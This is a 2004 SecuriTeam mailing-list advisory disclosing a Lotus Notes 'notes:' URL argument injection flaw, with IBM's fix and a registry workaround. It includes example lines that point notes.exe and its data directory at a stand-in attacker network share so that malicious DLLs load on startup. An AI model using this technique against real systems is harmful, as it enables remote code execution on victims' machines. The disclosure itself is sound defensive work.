[NT] Lotus Notes URL Argument Injection Vulnerability

• Previous message: SecuriTeam: "[UNIX] Artmedic Links File Inclusion Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 29 Jun 2004 09:41:31 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Lotus Notes URL Argument Injection Vulnerability
------------------------------------------------------------------------

SUMMARY

Lotus Notes is "a groupware/e-mail system developed by Lotus Software. Due
to its security and collaboration features it's used particularly by large
organizations, government agencies, etc. IBM estimates it is used by 60
million people".

During the client-side Windows installation of Lotus Notes, a "notes:" URL
handler is registered in the registry. An argument injection attack allows
an intruder to pass command line arguments to notes.exe, which can lead to
execution of arbitrary code.

DETAILS

The installed registry entry causes any "notes:" URL to be opened with
notes.exe and the URL passed as the argument. If the URL contains space
characters, notes.exe takes the characters after that as a second command
line argument. Any web page can cause notes.exe be started in this way by
referring to a notes: URL.

Location of Notes configuration file, notes.ini, can be specified on the
command line by prefixing it with an equals sign (=). The notes.ini file
can be located on a network share. An attacker can use the URL to specify
an arbitrary notes.ini file located on a public network share, so that the
command run when opening the URL would be e.g.

  notes.exe =\\attacker.server\notes\notes.ini

The notes.ini file contains locations for Notes data directory, which in
this case can be also located on a public network share. The notes.ini
file could contain e.g.

  [Notes]
  Directory=\\attacker.server\\notes

The program uses this directory to load some dynamic libraries. The
attacker can place arbitrary code in the init section of such DLL and
cause it to be run during notes.exe startup. The scenario was successfully
tested with an exploit. On opening the malicious web page, the victim
system downloaded the DLL and ran the code in it.

The exploit requires that notes.exe isn't already running while the victim
views the malicious web page or e-mail message, because DLL's are only
loaded on program startup. It also requires that outgoing connections to
Internet based shares will not blocked by firewalls or registry settings.

Solution:
IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now been
released to solve the issue. As a workaround, the registry key

   HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

can be removed.

ADDITIONAL INFORMATION

The information has been provided by <mailto:jouko@iki.fi> Jouko
Pynnonen.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Artmedic Links File Inclusion Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]